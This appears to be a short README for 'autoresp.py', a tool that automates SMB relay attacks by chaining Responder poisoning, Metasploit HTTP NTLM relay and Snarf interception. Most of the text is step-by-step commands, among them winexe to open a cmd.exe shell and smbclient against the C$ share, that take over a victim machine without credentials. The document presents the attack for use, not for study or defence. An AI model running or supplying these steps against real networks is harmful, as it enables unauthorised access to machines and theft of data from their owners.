Automatically performs the SMB relay attack. Uses Responder to poison, Metasploit for HTTP NTLM relay (rather than just SMB relay), and Snarf for the MITM'ing.
-
pip install -r requirements
-
python autoresp.py -i [interface] -x [nmap xml file]
-
Point your browser to http://localhost:4001 and refresh it periodically to see your MITM'd connections
-
After a connection is expired (or you expire it), click "choose"
-
run: winexe //127.0.0.1 -U "a%a" cmd.exe
-
If your SMB connection had admin rights, you now have a shell without any credentials.
-
Failing that, try: smbclient -U a%a //127.0.0.1/C$ and you should now have the ability to upload and download stuff from the compromised system